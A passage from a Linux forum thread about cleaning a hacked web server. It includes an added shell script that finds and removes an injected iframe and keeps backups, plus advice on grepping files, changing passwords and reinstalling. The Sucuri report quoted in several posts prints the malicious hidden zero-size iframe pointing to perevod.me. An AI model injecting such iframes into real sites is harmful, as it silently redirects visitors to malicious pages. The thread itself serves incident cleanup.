    After you have cleaned up your files (don't forget important config files such as httpd.conf / apache2.conf), archive them and scan them for viruses. Do the same with the DBs. Next, have your VM/VPS reinstalled fresh, and restore your files. This will prevent any tampered system files from acting as a rootkit.
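    The grep-and-review steps above, turned into a script: this is an added example, not code from the thread or from the host's support. It only handles the hidden perevod.me iframe quoted in the Sucuri report (the eval/base64 PHP hits from the host's find command still need a manual look), keeps a backup copy of every file it touches, and assumes GNU or busybox find, grep and sed, run on a copy of the docroot with the web server stopped.

```shell
#!/bin/sh
# Added example, not code from the thread: locate web files carrying the
# hidden perevod.me iframe from the Sucuri report, keep a backup copy of
# each one, then strip the tag in place. Assumes GNU (or busybox) find,
# grep and sed; run it on a copy first, with the web server stopped.
set -eu

# Signature taken from the report quoted in the thread: an iframe whose src
# points at perevod.me, with an optional closing tag. Bracket classes keep
# the match case-insensitive (<ifRamE>) without GNU-only sed flags.
IFRAME_RE='<[iI][fF][rR][aA][mM][eE][^>]*perevod\.me[^>]*>(</[iI][fF][rR][aA][mM][eE]>)?'

# list_infected DIR: print every .php / .htm* / .js file under DIR that
# mentions perevod.me (the file types the host's find command covered;
# '*htm*' also catches the .shtml files the thread says were hit).
list_infected() {
  find "$1" -type f \( -iname '*.php' -o -iname '*htm*' -o -iname '*.js' \) -print0 \
    | xargs -0r grep -il 'perevod\.me' || true
}

# clean_file FILE BACKUPDIR: copy FILE under BACKUPDIR (original path kept),
# remove the iframe in place, succeed only if the file actually changed.
clean_file() {
  local f backup
  f="$1"; backup="$2"
  mkdir -p "$backup/$(dirname "$f")"
  cp -p "$f" "$backup/$f"
  sed -E -i "s#${IFRAME_RE}##g" "$f"
  ! cmp -s "$f" "$backup/$f"
}

# clean_tree DIR BACKUPDIR: clean every infected file under DIR and print
# one "cleaned: <path>" line per modified file, so the run leaves a record
# of what was touched (filenames containing newlines are not supported).
clean_tree() {
  list_infected "$1" | while IFS= read -r f; do
    clean_file "$f" "$2" && echo "cleaned: $f"
  done
}

# Usage: clean_tree /path/to/docroot /path/to/backup
```

    Files that still match after a run (the second grep pass in the steps above) carry something other than this exact iframe and should be opened by hand rather than fed to a broader regex.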

  10. #9
    Just Joined!
    Join Date
    Feb 2013
    Posts
    5
    The passwords were changed the second we knew there was an issue.

    Here is a report from the Sucuri check. I am not allowed to enter a URL, so I removed the http and added xxxx in place of it.

    Known javascript malware.
    Details:sucurinet/malware/malware-entry-mwiframeenc1560
    <iframe src="xxxx://perevod.me/sts/sTDS/go.php?sid=1" width="0" height="0" frameborder="0"></iframe></body>

    Hidden Iframes.
    Details: sucurinet/malware/entry/MW:IFRAME:HD202
    <iframe src="xxxx://perevod.me/sts/sTDS/go.php?sid=1" width="0" height="0" frameborder="0">

    Quote Originally Posted by mizzle View Post
    So, a lot of times when a server gets hacked the DBs are infected too. You'll have to manually scrub your DBs as well as change their passwords.

    Anyway, best way I can think of is go to each directory and subdirectory and run the following (after stopping the webserver):
    grep -i iframe *
    That will search each file in the directory for an instance of "iframe"
    The output of the command will be something like:
    filename1: <iframe> blahblahblah
    filename2: blha <ifRamE>blah blah blah

    You get it.

    Also change the admin login passwords for your website's admin login area, if applicable.

    Also, I would run the same steps with
    grep -i script *
    and manually review each and every instance of a script reference. Lots of times there are off-site JavaScript files embedded in each of the files.

    After you have cleaned up your files (don't forget important config files such as httpd.conf / apache2.conf), archive them and scan them for viruses. Do the same with the DBs. Next, have your VM/VPS reinstalled fresh, and restore your files. This will prevent any tampered system files from acting as a rootkit.

  11. #10
    Linux Engineer
    Join Date
    Apr 2012
    Location
    Virginia, USA
    Posts
    917
    Quote Originally Posted by bailenforcer View Post
    The passwords were changed the second we knew there was an issue.

    Here is a report from the Sucuri check. I am not allowed to enter a URL, so I removed the http and added xxxx in place of it.

    Known javascript malware.
    Details:sucurinet/malware/malware-entry-mwiframeenc1560
    <iframe src="xxxx://perevod.me/sts/sTDS/go.php?sid=1" width="0" height="0" frameborder="0"></iframe></body>

    Hidden Iframes.
    Details: sucurinet/malware/entry/MW:IFRAME:HD202
    <iframe src="xxxx://perevod.me/sts/sTDS/go.php?sid=1" width="0" height="0" frameborder="0">
    I gave you the instructions to find the infected files and the other necessary steps.
